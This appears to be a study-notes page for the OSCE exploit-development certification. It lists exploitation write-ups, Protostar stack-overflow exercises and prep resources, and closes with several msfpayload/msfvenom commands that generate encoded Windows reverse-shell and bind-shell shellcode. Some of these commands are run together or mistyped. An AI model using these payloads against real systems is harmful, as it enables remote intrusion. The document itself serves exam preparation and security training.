- Backdooring PE - Weaponizing Your Favorite PE
- SEH + Egghunter - Winamp 5.12 Exploitation using Egghunter
- SEH + Egghunter(Manual Encoding) - HP OpenView NNM 7.5 Exploitation
Exploit Exercise (Protostar)
| Module | Link | Note |
|---|---|---|
| Stack0 | Stack BOF Intro | |
| Stack1 | Stack BOF Basic1 | |
| Stack2 | Stack BOF Basic2 | |
| Stack3 | Stack BOF Basic3 | |
| Stack4 | Stack BOF Basic4 | |
| Stack5 | Stack BOF Shellcode | |
| Stack6 | Stack BOF ret2libc | ROP is no need for OSCE |
| Stack7 | Stack BOF ret2.text | ROP is no need for OSCE. But learn POP; POP; RET concept with this |
- Study Plan - https://www.abatchy.com/2017/03/osce-study-plan
- Prep Guide - https://tulpa-security.com/2017/07/18/288/
- Mona.py - https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
- Techryptic - Great Tips
- Jack Halon - https://jhalon.github.io/OSCE-Review/
- Examples - https://github.com/dhn/OSCE
- OSCE_Bible - https://github.com/mohitkhemchandani/OSCE_BIBLE
- FullShade - https://github.com/FULLSHADE/OSCE (*POCs)
- h0mbre - https://github.com/h0mbre/CTP-OSCE (*Good helpers)
- ihack4falafel - https://github.com/ihack4falafel/OSCE
-
FuzzSecurity - http://fuzzysecurity.com/tutorials.html
-
SecuritySift - http://www.securitysift.com/
-
Fuzzing
-
Structured Exception Handler (SEH)
-
Egghunter
-
ASLR
-
Shellcoding
-
Web Application
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C
msfvenom -p windows/shell_reverse_tcp LHOST=1192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f rawmsfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perlmsfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl